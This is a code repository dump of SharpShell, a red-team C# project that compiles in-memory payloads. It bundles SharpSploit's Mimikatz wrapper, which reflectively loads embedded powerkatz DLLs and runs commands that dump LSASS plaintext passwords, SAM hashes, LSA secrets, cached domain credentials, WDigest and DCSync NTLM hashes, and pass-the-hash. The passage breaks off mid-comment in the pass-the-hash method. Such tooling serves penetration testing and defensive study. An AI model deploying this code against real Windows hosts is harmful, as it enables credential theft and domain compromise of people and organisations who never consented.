Startup 17 | { 18 | public Startup(IConfiguration configuration) 19 | { 20 | Configuration = configuration; 21 | } 22 | 23 | public IConfiguration Configuration { get; } 24 | 25 | // This method gets called by the runtime. Use this method to add services to the container. 26 | public void ConfigureServices(IServiceCollection services) 27 | { 28 | services.AddMvc().SetCompatibilityVersion(CompatibilityVersion.Version_2_1); 29 | 30 | services.AddDbContext(opt => 31 | { 32 | opt.UseInMemoryDatabase("SharpShellDB"); 33 | }); 34 | 35 | services.AddSwaggerGen(c => 36 | { 37 | c.SwaggerDoc("v1", new Info { Title = "SharpShell.API", Version = "v0.1" }); 38 | }); 39 | } 40 | 41 | // This method gets called by the runtime. Use this method to configure the HTTP request pipeline. 42 | public void Configure(IApplicationBuilder app, IHostingEnvironment env) 43 | { 44 | if (env.IsDevelopment()) 45 | { 46 | app.UseDeveloperExceptionPage(); 47 | } 48 | app.UseSwagger(); 49 | app.UseSwaggerUI(c => 50 | { 51 | c.SwaggerEndpoint("/swagger/v1/swagger.json", "SharpShell.API v0.1"); 52 | }); 53 | 54 | app.UseMvc(); 55 | } 56 | } 57 | } 58 | -------------------------------------------------------------------------------- /SharpShell.API/appsettings.Development.json: -------------------------------------------------------------------------------- 1 | { 2 | "Logging": { 3 | "LogLevel": { 4 | "Default": "Debug", 5 | "System": "Information", 6 | "Microsoft": "Information" 7 | } 8 | } 9 | } 10 | -------------------------------------------------------------------------------- /SharpShell.API/appsettings.json: -------------------------------------------------------------------------------- 1 | { 2 | "Logging": { 3 | "LogLevel": { 4 | "Default": "Warning" 5 | } 6 | }, 7 | "AllowedHosts": "*" 8 | } 9 | -------------------------------------------------------------------------------- /SharpShell.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 15 4 | VisualStudioVersion = 15.0.28010.2016 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SharpShell", "SharpShell\SharpShell.csproj", "{BDBA47C5-E823-4404-91D0-7F6561279525}" 7 | EndProject 8 | Project("{9A19103F-16F7-4668-BE54-9A1E7A4F7556}") = "SharpShell.API", "SharpShell.API\SharpShell.API.csproj", "{09FDD9AA-90B1-4F86-B283-3DF519CA8628}" 9 | EndProject 10 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SharpShell.API.SharpShell", "SharpShell.API.SharpShell\SharpShell.API.SharpShell.csproj", "{B84548DC-D926-4B39-8293-FA0BDEF34D49}" 11 | EndProject 12 | Global 13 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 14 | Debug|Any CPU = Debug|Any CPU 15 | Release|Any CPU = Release|Any CPU 16 | EndGlobalSection 17 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 18 | {BDBA47C5-E823-4404-91D0-7F6561279525}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 19 | {BDBA47C5-E823-4404-91D0-7F6561279525}.Debug|Any CPU.Build.0 = Debug|Any CPU 20 | {BDBA47C5-E823-4404-91D0-7F6561279525}.Release|Any CPU.ActiveCfg = Release|Any CPU 21 | {BDBA47C5-E823-4404-91D0-7F6561279525}.Release|Any CPU.Build.0 = Release|Any CPU 22 | {09FDD9AA-90B1-4F86-B283-3DF519CA8628}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 23 | {09FDD9AA-90B1-4F86-B283-3DF519CA8628}.Debug|Any CPU.Build.0 = Debug|Any CPU 24 | {09FDD9AA-90B1-4F86-B283-3DF519CA8628}.Release|Any CPU.ActiveCfg = Release|Any CPU 25 | {09FDD9AA-90B1-4F86-B283-3DF519CA8628}.Release|Any CPU.Build.0 = Release|Any CPU 26 | {B84548DC-D926-4B39-8293-FA0BDEF34D49}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 27 | {B84548DC-D926-4B39-8293-FA0BDEF34D49}.Debug|Any CPU.Build.0 = Debug|Any CPU 28 | {B84548DC-D926-4B39-8293-FA0BDEF34D49}.Release|Any CPU.ActiveCfg = Release|Any CPU 29 | {B84548DC-D926-4B39-8293-FA0BDEF34D49}.Release|Any CPU.Build.0 = Release|Any CPU 30 | EndGlobalSection 31 | GlobalSection(SolutionProperties) = preSolution 32 | HideSolutionNode = FALSE 33 | EndGlobalSection 34 | GlobalSection(ExtensibilityGlobals) = postSolution 35 | SolutionGuid = {508697D8-3450-4B88-B90C-B89C5ED758FB} 36 | EndGlobalSection 37 | EndGlobal 38 | -------------------------------------------------------------------------------- /SharpShell/App.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | -------------------------------------------------------------------------------- /SharpShell/Common.cs: -------------------------------------------------------------------------------- 1 | // Author: Ryan Cobb (@cobbr_io) 2 | // Project: SharpShell (https://github.com/cobbr/SharpShell) 3 | // License: BSD 3-Clause 4 | 5 | using System.IO; 6 | using System.Text; 7 | using System.Reflection; 8 | 9 | namespace SharpShell 10 | { 11 | public static class Common 12 | { 13 | public static Encoding SharpShellEncoding = Encoding.UTF8; 14 | public static string SharpShellDirectory = Assembly.GetExecutingAssembly().Location.SplitFirst("bin"); 15 | public static string SharpShellDataDirectory = SharpShellDirectory + "Data" + Path.DirectorySeparatorChar; 16 | 17 | public static string SharpShellResourcesDirectory = SharpShellDataDirectory + "Resources" + Path.DirectorySeparatorChar; 18 | public static string SharpShellResourcesConfig = SharpShellResourcesDirectory + "resources.yml"; 19 | 20 | public static string SharpShellReferencesDirectory = SharpShellDataDirectory + "References" + Path.DirectorySeparatorChar; 21 | public static string SharpShellReferencesConfig = SharpShellReferencesDirectory + "references.yml"; 22 | 23 | public static string Net35Directory = SharpShellReferencesDirectory + "net35" + Path.DirectorySeparatorChar; 24 | public static string Net40Directory = SharpShellReferencesDirectory + "net40" + Path.DirectorySeparatorChar; 25 | 26 | public static string SharpShellSourceDirectory = SharpShellDataDirectory + "Source" + Path.DirectorySeparatorChar; 27 | } 28 | 29 | public static class Utilities 30 | { 31 | public static string SplitFirst(this string original, string split) 32 | { 33 | int index = original.IndexOf(split); 34 | if (index == -1) { return original; } 35 | return original.Substring(0, index); 36 | } 37 | } 38 | } -------------------------------------------------------------------------------- /SharpShell/Compiler.cs: -------------------------------------------------------------------------------- 1 | // Author: Ryan Cobb (@cobbr_io) 2 | // Project: SharpShell (https://github.com/cobbr/SharpShell) 3 | // License: BSD 3-Clause 4 | 5 | using System; 6 | using System.IO; 7 | using System.Text; 8 | using System.Linq; 9 | using System.IO.Compression; 10 | using System.Collections.Generic; 11 | 12 | using Microsoft.CodeAnalysis; 13 | using Microsoft.CodeAnalysis.CSharp; 14 | using Microsoft.CodeAnalysis.CSharp.Syntax; 15 | using Microsoft.CodeAnalysis.Emit; 16 | 17 | namespace SharpShell 18 | { 19 | public class Compiler 20 | { 21 | public class CompilationRequest 22 | { 23 | public string Source { get; set; } = null; 24 | public string SourceDirectory { get; set; } = null; 25 | public string ResourceDirectory { get; set; } = null; 26 | public string ReferenceDirectory { get; set; } = null; 27 | 28 | public DotNetVersion TargetDotNetVersion { get; set; } = DotNetVersion.Net35; 29 | public OutputKind OutputKind { get; set; } = OutputKind.DynamicallyLinkedLibrary; 30 | public Platform Platform { get; set; } = Platform.AnyCpu; 31 | public bool Optimize = true; 32 | 33 | public string AssemblyName { get; set; } = null; 34 | public List References { get; set; } = new List(); 35 | public List EmbeddedResources { get; set; } = new List(); 36 | } 37 | 38 | public enum DotNetVersion 39 | { 40 | Net35, 41 | Net40 42 | } 43 | 44 | public class EmbeddedResource 45 | { 46 | public string Name { get; set; } 47 | public string File { get; set; } 48 | public Platform Platform { get; set; } = Platform.AnyCpu; 49 | public bool Enabled { get; set; } = false; 50 | } 51 | 52 | public class Reference 53 | { 54 | public string File { get; set; } 55 | public DotNetVersion Framework { get; set; } = DotNetVersion.Net35; 56 | public bool Enabled { get; set; } = false; 57 | } 58 | 59 | private class SourceSyntaxTree 60 | { 61 | public string FileName { get; set; } = ""; 62 | public SyntaxTree SyntaxTree { get; set; } 63 | public List UsedTypes { get; set; } = new List(); 64 | } 65 | 66 | public static byte[] Compile(CompilationRequest request) 67 | { 68 | // Gather SyntaxTrees for compilation 69 | List sourceSyntaxTrees = Directory.GetFiles(request.SourceDirectory, "*.cs", SearchOption.AllDirectories) 70 | .Select(F => new SourceSyntaxTree { FileName = F, SyntaxTree = CSharpSyntaxTree.ParseText(File.ReadAllText(F), new CSharpParseOptions()) }) 71 | .ToList(); 72 | List compilationTrees = sourceSyntaxTrees.Select(S => S.SyntaxTree).ToList(); 73 | 74 | SyntaxTree sourceTree = CSharpSyntaxTree.ParseText(request.Source, new CSharpParseOptions()); 75 | compilationTrees.Add(sourceTree); 76 | 77 | // Use specified OutputKind and Platform 78 | CSharpCompilationOptions options = new CSharpCompilationOptions(outputKind: request.OutputKind, optimizationLevel: OptimizationLevel.Release, platform: request.Platform); 79 | // Compile to obtain SemanticModel 80 | CSharpCompilation compilation = CSharpCompilation.Create( 81 | request.AssemblyName == null ? Path.GetRandomFileName() : request.AssemblyName, 82 | compilationTrees, 83 | request.References.Where(R => R.Framework == request.TargetDotNetVersion).Where(R => R.Enabled).Select(R => 84 | { 85 | string folder = (request.TargetDotNetVersion == DotNetVersion.Net35 ? request.ReferenceDirectory + "net35" + Path.DirectorySeparatorChar : request.ReferenceDirectory + "net40" + Path.DirectorySeparatorChar); 86 | return MetadataReference.CreateFromFile(folder + R.File); 87 | }).ToList(), 88 | options 89 | ); 90 | 91 | // Perform source code optimization, removing unused types 92 | if (request.Optimize) 93 | { 94 | // Find all Types used by the generated compilation 95 | List usedTypes = new List(); 96 | GetUsedTypesRecursively(compilation, sourceTree, ref usedTypes, ref sourceSyntaxTrees); 97 | usedTypes = usedTypes.Distinct().ToList(); 98 | List usedTypeNames = usedTypes.Select(T => GetFullyQualifiedTypeName(T)).ToList(); 99 | // SharpGenConsole.PrintInfoLine("usedTypes: " + String.Join(",", usedTypeNames)); 100 | 101 | // Filter SyntaxTrees to trees that define a used Type, otherwise the tree is not needed in this compilation 102 | compilationTrees = sourceSyntaxTrees.Where(SST => SyntaxTreeDefinesUsedType(compilation, SST.SyntaxTree, usedTypeNames)) 103 | .Select(SST => SST.SyntaxTree) 104 | .ToList(); 105 | 106 | // Removed unused Using statements from the additional entrypoint source 107 | List usedNamespaceNames = GetUsedTypes(compilation, sourceTree) 108 | .Select(T => GetFullyQualifiedContainingNamespaceName(T)).Distinct().ToList(); 109 | // SharpGenConsole.PrintInfoLine("usedNamespaces: " + String.Join(",", usedNamespaceNames)); 110 | List unusedUsingDirectives = sourceTree.GetRoot().DescendantNodes().Where(N => 111 | { 112 | return N.Kind() == SyntaxKind.UsingDirective && !usedNamespaceNames.Contains(((UsingDirectiveSyntax)N).Name.ToFullString()); 113 | }).ToList(); 114 | sourceTree = sourceTree.GetRoot().RemoveNodes(unusedUsingDirectives, SyntaxRemoveOptions.KeepNoTrivia).SyntaxTree; 115 | 116 | // Compile again, with unused SyntaxTrees and unused using statements removed 117 | compilationTrees.Add(sourceTree); 118 | compilation = CSharpCompilation.Create( 119 | request.AssemblyName == null ? Path.GetRandomFileName() : request.AssemblyName, 120 | compilationTrees, 121 | request.References.Where(R => R.Framework == request.TargetDotNetVersion).Where(R => R.Enabled).Select(R => 122 | { 123 | string folder = (request.TargetDotNetVersion == DotNetVersion.Net35 ? request.ReferenceDirectory + "net35" + Path.DirectorySeparatorChar : request.ReferenceDirectory + "net40" + Path.DirectorySeparatorChar); 124 | return MetadataReference.CreateFromFile(folder + R.File); 125 | }).ToList(), 126 | options 127 | ); 128 | } 129 | 130 | // Emit compilation 131 | EmitResult emitResult; 132 | byte[] ILbytes = null; 133 | using (var ms = new MemoryStream()) 134 | { 135 | emitResult = compilation.Emit( 136 | ms, 137 | manifestResources: request.EmbeddedResources.Where(ER => 138 | { 139 | return request.Platform == Platform.AnyCpu || ER.Platform == Platform.AnyCpu || ER.Platform == request.Platform; 140 | }).Where(ER => ER.Enabled).Select(ER => 141 | { 142 | return new ResourceDescription(ER.Name, () => File.OpenRead(request.ResourceDirectory + ER.File), true); 143 | }).ToList() 144 | ); 145 | if (emitResult.Success) 146 | { 147 | ms.Flush(); 148 | ms.Seek(0, SeekOrigin.Begin); 149 | ILbytes = ms.ToArray(); 150 | } 151 | else 152 | { 153 | StringBuilder sb = new StringBuilder(); 154 | foreach (Diagnostic d in emitResult.Diagnostics) 155 | { 156 | sb.AppendLine(d.ToString()); 157 | } 158 | throw new CompilerException("CompilationErrors: " + Environment.NewLine + sb); 159 | } 160 | } 161 | return ILbytes; 162 | } 163 | 164 | private static string GetFullyQualifiedContainingNamespaceName(INamespaceSymbol namespaceSymbol) 165 | { 166 | string name = namespaceSymbol.Name; 167 | namespaceSymbol = namespaceSymbol.ContainingNamespace; 168 | while (namespaceSymbol != null) 169 | { 170 | name = namespaceSymbol.Name + "." + name; 171 | namespaceSymbol = namespaceSymbol.ContainingNamespace; 172 | } 173 | return name.Trim('.'); 174 | } 175 | 176 | private static string GetFullyQualifiedContainingNamespaceName(INamedTypeSymbol namedTypeSymbol) 177 | { 178 | return GetFullyQualifiedContainingNamespaceName(namedTypeSymbol.ContainingNamespace); 179 | } 180 | 181 | private static string GetFullyQualifiedTypeName(INamedTypeSymbol namedTypeSymbol) 182 | { 183 | return GetFullyQualifiedContainingNamespaceName(namedTypeSymbol) + "." + namedTypeSymbol.Name; 184 | } 185 | 186 | private static bool SyntaxTreeDefinesUsedType(CSharpCompilation compilation, SyntaxTree tree, List typeNames) 187 | { 188 | SemanticModel model = compilation.GetSemanticModel(tree); 189 | return null != tree.GetRoot().DescendantNodes().FirstOrDefault(SN => 190 | { 191 | if (SN.Kind() != SyntaxKind.ClassDeclaration) 192 | { 193 | return false; 194 | } 195 | INamedTypeSymbol symbol = model.GetDeclaredSymbol(((ClassDeclarationSyntax)SN)); 196 | if (symbol == null) 197 | { 198 | return false; 199 | } 200 | return typeNames.Contains( 201 | GetFullyQualifiedTypeName(symbol) 202 | ); 203 | }); 204 | } 205 | 206 | private static List GetUsedTypes(CSharpCompilation compilation, SyntaxTree sourceTree) 207 | { 208 | return sourceTree.GetRoot().DescendantNodes().Select(N => 209 | { 210 | ISymbol symbol = compilation.GetSemanticModel(sourceTree).GetSymbolInfo(N).Symbol; 211 | if (symbol != null && symbol.ContainingType != null) 212 | { 213 | return symbol.ContainingType; 214 | } 215 | return null; 216 | }).Distinct().Where(T => T != null).ToList(); 217 | } 218 | 219 | private static List GetUsedTypesRecursively(CSharpCompilation compilation, SyntaxTree sourceTree, ref List currentUsedTypes, ref List sourceSyntaxTrees) 220 | { 221 | List copyCurrentUsedTypes = currentUsedTypes.Select(CT => GetFullyQualifiedTypeName(CT)).ToList(); 222 | List usedTypes = GetUsedTypes(compilation, sourceTree) 223 | .Where(T => !copyCurrentUsedTypes.Contains(GetFullyQualifiedTypeName(T))) 224 | .ToList(); 225 | currentUsedTypes.AddRange(usedTypes); 226 | 227 | List searchTrees = new List(); 228 | foreach (INamedTypeSymbol symbol in usedTypes) 229 | { 230 | SyntaxReference sr = symbol.DeclaringSyntaxReferences.FirstOrDefault(); 231 | if (sr != null) 232 | { 233 | SourceSyntaxTree sst = sourceSyntaxTrees.FirstOrDefault(SST => SST.SyntaxTree == sr.SyntaxTree); 234 | if (sst != null) { sst.UsedTypes.Add(symbol); } 235 | string fullyQualifiedTypeName = GetFullyQualifiedTypeName(symbol); 236 | searchTrees.Add(sr.SyntaxTree); 237 | } 238 | } 239 | 240 | searchTrees = searchTrees.Distinct().ToList(); 241 | foreach (SyntaxTree tree in searchTrees) 242 | { 243 | List newTypes = GetUsedTypesRecursively(compilation, tree, ref currentUsedTypes, ref sourceSyntaxTrees); 244 | currentUsedTypes.AddRange(newTypes); 245 | } 246 | return currentUsedTypes; 247 | } 248 | 249 | public static byte[] Compress(byte[] bytes) 250 | { 251 | byte[] compressedILBytes; 252 | using (MemoryStream memoryStream = new MemoryStream()) 253 | { 254 | using (DeflateStream deflateStream = new DeflateStream(memoryStream, CompressionMode.Compress)) 255 | { 256 | deflateStream.Write(bytes, 0, bytes.Length); 257 | } 258 | compressedILBytes = memoryStream.ToArray(); 259 | } 260 | return compressedILBytes; 261 | } 262 | } 263 | 264 | public class CompilerException : Exception 265 | { 266 | public CompilerException() 267 | { 268 | 269 | } 270 | 271 | public CompilerException(string message) : base(message) 272 | { 273 | 274 | } 275 | 276 | public CompilerException(string message, Exception inner) : base(message, inner) 277 | { 278 | 279 | } 280 | } 281 | } -------------------------------------------------------------------------------- /SharpShell/Data/References/net35/System.Core.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell/Data/References/net35/System.Core.dll -------------------------------------------------------------------------------- /SharpShell/Data/References/net35/System.DirectoryServices.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell/Data/References/net35/System.DirectoryServices.dll -------------------------------------------------------------------------------- /SharpShell/Data/References/net35/System.IdentityModel.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell/Data/References/net35/System.IdentityModel.dll -------------------------------------------------------------------------------- /SharpShell/Data/References/net35/System.Management.Automation.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell/Data/References/net35/System.Management.Automation.dll -------------------------------------------------------------------------------- /SharpShell/Data/References/net35/System.Management.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell/Data/References/net35/System.Management.dll -------------------------------------------------------------------------------- /SharpShell/Data/References/net35/System.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell/Data/References/net35/System.dll -------------------------------------------------------------------------------- /SharpShell/Data/References/net35/mscorlib.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell/Data/References/net35/mscorlib.dll -------------------------------------------------------------------------------- /SharpShell/Data/References/net40/System.Core.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell/Data/References/net40/System.Core.dll -------------------------------------------------------------------------------- /SharpShell/Data/References/net40/System.DirectoryServices.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell/Data/References/net40/System.DirectoryServices.dll -------------------------------------------------------------------------------- /SharpShell/Data/References/net40/System.IdentityModel.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell/Data/References/net40/System.IdentityModel.dll -------------------------------------------------------------------------------- /SharpShell/Data/References/net40/System.Management.Automation.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell/Data/References/net40/System.Management.Automation.dll -------------------------------------------------------------------------------- /SharpShell/Data/References/net40/System.Management.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell/Data/References/net40/System.Management.dll -------------------------------------------------------------------------------- /SharpShell/Data/References/net40/System.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell/Data/References/net40/System.dll -------------------------------------------------------------------------------- /SharpShell/Data/References/net40/mscorlib.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell/Data/References/net40/mscorlib.dll -------------------------------------------------------------------------------- /SharpShell/Data/References/references.yml: -------------------------------------------------------------------------------- 1 | - File: mscorlib.dll 2 | Framework: Net35 3 | Enabled: true 4 | - File: System.dll 5 | Framework: Net35 6 | Enabled: true 7 | - File: System.Core.dll 8 | Framework: Net35 9 | Enabled: true 10 | - File: System.Management.dll 11 | Framework: Net35 12 | Enabled: true 13 | - File: System.IdentityModel.dll 14 | Framework: Net35 15 | Enabled: true 16 | - File: System.DirectoryServices.dll 17 | Framework: Net35 18 | Enabled: true 19 | - File: System.Management.Automation.dll 20 | Framework: Net35 21 | Enabled: true 22 | - File: mscorlib.dll 23 | Framework: Net40 24 | Enabled: true 25 | - File: System.dll 26 | Framework: Net40 27 | Enabled: true 28 | - File: System.Core.dll 29 | Framework: Net40 30 | Enabled: true 31 | - File: System.Management.dll 32 | Framework: Net40 33 | Enabled: true 34 | - File: System.IdentityModel.dll 35 | Framework: Net40 36 | Enabled: true 37 | - File: System.DirectoryServices.dll 38 | Framework: Net40 39 | Enabled: true 40 | - File: System.Management.Automation.dll 41 | Framework: Net40 42 | Enabled: true -------------------------------------------------------------------------------- /SharpShell/Data/Resources/powerkatz_x64.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell/Data/Resources/powerkatz_x64.dll -------------------------------------------------------------------------------- /SharpShell/Data/Resources/powerkatz_x64.dll.comp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell/Data/Resources/powerkatz_x64.dll.comp -------------------------------------------------------------------------------- /SharpShell/Data/Resources/powerkatz_x86.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell/Data/Resources/powerkatz_x86.dll -------------------------------------------------------------------------------- /SharpShell/Data/Resources/powerkatz_x86.dll.comp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cobbr/SharpShell/683a05a9df13eccd627a41d60859836bc17e8d44/SharpShell/Data/Resources/powerkatz_x86.dll.comp -------------------------------------------------------------------------------- /SharpShell/Data/Resources/resources.yml: -------------------------------------------------------------------------------- 1 | - Name: SharpSploit.Resources.powerkatz_x86.dll 2 | File: powerkatz_x86.dll 3 | Platform: x86 4 | Enabled: false 5 | - Name: SharpSploit.Resources.powerkatz_x64.dll 6 | File: powerkatz_x64.dll 7 | Platform: x64 8 | Enabled: false 9 | - Name: SharpSploit.Resources.powerkatz_x86.dll.comp 10 | File: powerkatz_x86.dll.comp 11 | Platform: x86 12 | Enabled: true 13 | - Name: SharpSploit.Resources.powerkatz_x64.dll.comp 14 | File: powerkatz_x64.dll.comp 15 | Platform: x64 16 | Enabled: true -------------------------------------------------------------------------------- /SharpShell/Data/Source/SharpSploit/Credentials/Mimikatz.cs: -------------------------------------------------------------------------------- 1 | // Author: Ryan Cobb (@cobbr_io) 2 | // Project: SharpSploit (https://github.com/cobbr/SharpSploit) 3 | // License: BSD 3-Clause 4 | 5 | using System; 6 | using System.Text; 7 | using System.Net.NetworkInformation; 8 | using System.Runtime.InteropServices; 9 | 10 | using SharpSploit.Misc; 11 | using SharpSploit.Execution; 12 | 13 | namespace SharpSploit.Credentials 14 | { 15 | /// 16 | /// (SharpSploit.Credentials.)Mimikatz is a library for executing Mimikatz functions. SharpSploit's implementation 17 | /// uses a PE Loader to execute Mimikatz functions. This is a wrapper class that loads the PE and executes user- 18 | /// specified Mimikatz functions 19 | /// 20 | /// 21 | /// Mimikatz is a tool for playing with credentials in Windows, written by Benjamin Delpy (@gentilkiwi). (Found 22 | /// at https://github.com/gentilkiwi/mimikatz). 23 | /// SharpSploit's PE Loader is adapted from work by Casey Smith (@subtee). (No longer available at original location.) 24 | /// This wrapper class is adapted from Chris Ross (@xorrior)'s implementation. (Found 25 | /// at https://github.com/xorrior/Random-CSharpTools/tree/master/DllLoader/DllLoader) 26 | /// 27 | public class Mimikatz 28 | { 29 | private static byte[] PEBytes32 { get; set; } 30 | private static byte[] PEBytes64 { get; set; } 31 | 32 | private static PE MimikatzPE { get; set; } = null; 33 | [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 34 | private delegate IntPtr MimikatzType(IntPtr command); 35 | 36 | /// 37 | /// Loads the Mimikatz PE with `PE.Load()` and executes a chosen Mimikatz command. 38 | /// 39 | /// Mimikatz command to be executed. 40 | /// Mimikatz output. 41 | public static string Command(string Command = "privilege::debug sekurlsa::logonPasswords") 42 | { 43 | // Console.WriteLine(String.Join(",", System.Reflection.Assembly.GetExecutingAssembly().GetManifestResourceNames())); 44 | if (MimikatzPE == null) 45 | { 46 | string[] manifestResources = System.Reflection.Assembly.GetExecutingAssembly().GetManifestResourceNames(); 47 | if (IntPtr.Size == 4 && MimikatzPE == null) 48 | { 49 | if (PEBytes32 == null) 50 | { 51 | PEBytes32 = Utilities.GetEmbeddedResourceBytes("powerkatz_x86.dll"); 52 | if (PEBytes32 == null) { return ""; } 53 | } 54 | MimikatzPE = PE.Load(PEBytes32); 55 | } 56 | else if (IntPtr.Size == 8 && MimikatzPE == null) 57 | { 58 | if (PEBytes64 == null) 59 | { 60 | PEBytes64 = Utilities.GetEmbeddedResourceBytes("powerkatz_x64.dll"); 61 | if (PEBytes64 == null) { return ""; } 62 | } 63 | MimikatzPE = PE.Load(PEBytes64); 64 | } 65 | } 66 | if (MimikatzPE == null) { return ""; } 67 | IntPtr functionPointer = MimikatzPE.GetFunctionExport("powershell_reflective_mimikatz"); 68 | if (functionPointer == IntPtr.Zero) { return ""; } 69 | 70 | MimikatzType mimikatz = (MimikatzType) Marshal.GetDelegateForFunctionPointer(functionPointer, typeof(MimikatzType)); 71 | IntPtr input = Marshal.StringToHGlobalUni(Command); 72 | try 73 | { 74 | IntPtr output = mimikatz(input); 75 | return Marshal.PtrToStringUni(output); 76 | } 77 | catch (Exception e) 78 | { 79 | Console.Error.WriteLine("MimikatzException: " + e.Message + e.StackTrace); 80 | return ""; 81 | } 82 | } 83 | 84 | /// 85 | /// Loads the Mimikatz PE with `PE.Load()` and executes the Mimikatzcommand to retrieve plaintext 86 | /// passwords from LSASS. Equates to `Command("privilege::debug sekurlsa::logonPasswords")`. (Requires Admin) 87 | /// 88 | /// Mimikatz output. 89 | public static string LogonPasswords() 90 | { 91 | return Command("privilege::debug sekurlsa::logonPasswords"); 92 | } 93 | 94 | /// 95 | /// Loads the Mimikatz PE with `PE.Load()` and executes the Mimikatz command to retrieve password hashes 96 | /// from the SAM database. Equates to `Command("privilege::debug lsadump::sam")`. (Requires Admin) 97 | /// 98 | /// Mimikatz output. 99 | public static string SamDump() 100 | { 101 | return Command("privilege::debug lsadump::sam"); 102 | } 103 | 104 | /// 105 | /// Loads the Mimikatz PE with `PE.Load()` and executes the Mimikatz command to retrieve LSA secrets 106 | /// stored in registry. Equates to `Command("privilege::debug lsadump::secrets")`. (Requires Admin) 107 | /// 108 | /// Mimikatz output. 109 | public static string LsaSecrets() 110 | { 111 | return Command("privilege::debug lsadump::secrets"); 112 | } 113 | 114 | /// 115 | /// Loads the Mimikatz PE with `PE.Load()` and executes the Mimikatz command to retrieve Domain 116 | /// Cached Credentials hashes from registry. Equates to `Command("privilege::debug lsadump::cache")`. 117 | /// (Requires Admin) 118 | /// 119 | /// Mimikatz output. 120 | public static string LsaCache() 121 | { 122 | return Command("privilege::debug lsadump::cache"); 123 | } 124 | 125 | /// 126 | /// Loads the Mimikatz PE with `PE.Load()` and executes the Mimikatz command to retrieve Wdigest 127 | /// credentials from registry. Equates to `Command("sekurlsa::wdigest")`. 128 | /// 129 | /// Mimikatz output. 130 | public static string Wdigest() 131 | { 132 | return Command("sekurlsa::wdigest"); 133 | } 134 | 135 | /// 136 | /// Loads the Mimikatz PE with `PE.Load()` and executes each of the builtin local commands (not DCSync). (Requires Admin) 137 | /// 138 | /// Mimikatz output. 139 | public static string All() 140 | { 141 | StringBuilder builder = new StringBuilder(); 142 | builder.AppendLine(LogonPasswords()); 143 | builder.AppendLine(SamDump()); 144 | builder.AppendLine(LsaSecrets()); 145 | builder.AppendLine(LsaCache()); 146 | builder.AppendLine(Wdigest()); 147 | return builder.ToString(); 148 | } 149 | 150 | /// 151 | /// Loads the Mimikatz PE with `PE.Load()` and executes the "dcsync" module to retrieve the NTLM hash of a specified (or all) Domain user. (Requires Domain Admin) 152 | /// 153 | /// Username to retrieve NTLM hash for. "All" for all domain users. 154 | /// Optionally specify an alternative fully qualified domain name. Default is current domain. 155 | /// Optionally specify a specific Domain Controller to target for the dcsync. 156 | /// The NTLM hash of the target user(s). 157 | public static string DCSync(string user, string FQDN = null, string DC = null) 158 | { 159 | string command = "lsadump::dcsync"; 160 | if (user.ToLower() == "all") 161 | { 162 | command += " /all"; 163 | } 164 | else 165 | { 166 | command += " /user:" + user; 167 | } 168 | if (FQDN != null) 169 | { 170 | command += " /domain:" + FQDN; 171 | } 172 | else 173 | { 174 | command += " /domain:" + IPGlobalProperties.GetIPGlobalProperties().DomainName; 175 | } 176 | if (DC != null) 177 | { 178 | command += " /dc:" + DC; 179 | } 180 | return Command(command); 181 | } 182 | 183 | /// 184 | /// Loads the Mimikatz PE with `PE.Load()` and executes the "pth" module to start a new process 185 | /// as a user using an NTLM password hash for authentication. 186 | /// 187 | /// Username to authenticate as. 188 | /// NTLM hash to authenticate the user. 189 | /// Optionally specify 